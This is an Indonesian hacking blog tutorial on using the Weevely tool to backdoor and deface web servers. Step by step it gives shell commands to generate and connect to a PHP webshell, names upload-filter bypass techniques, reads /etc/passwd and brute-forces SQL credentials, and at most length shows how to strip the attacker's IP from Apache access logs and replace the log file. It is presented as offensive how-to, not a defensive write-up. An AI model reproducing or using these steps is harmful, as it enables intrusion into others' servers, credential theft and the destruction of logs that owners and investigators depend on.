SUKSES? MAIN BITCOIN SEKARANG!
Daftar wallet bitcoin DISINI
Jika Anda publisher, CPM bayaran tinggi daftar DISINI

Cara Backdoor dan Deface Web Server Menggunakan Weevely


Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

Langsung saja ke langkah-langkahnya.

Baca juga,

Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py

Anda perlu menggunakan beberapa teknik untuk mengunggah webshell seperti teknik double extension, bypass image type validation, bypass whilelist/blacklist.
Lihat disini

Koneksikan ke Backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely


Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1

Demo

Jika Anda ingin berkomentar atau bertanya tentang topik artikel hacking tips trik diatas atau lainnya silahkan untuk mengunjungi halaman fanspage facebook kami.

*Share tips trik hacking ini ke sosial media Anda*

Tips Trik Tutorial Cara Backdoor dan Deface Web Server Menggunakan Weevely
AC10 Writer

Selamat datang diblog hacking ini dan terimakasih. Jangan lupa like fanspage facebook ArtikelCara10! Donate kllik ikllan, thx n00b.

Related Posts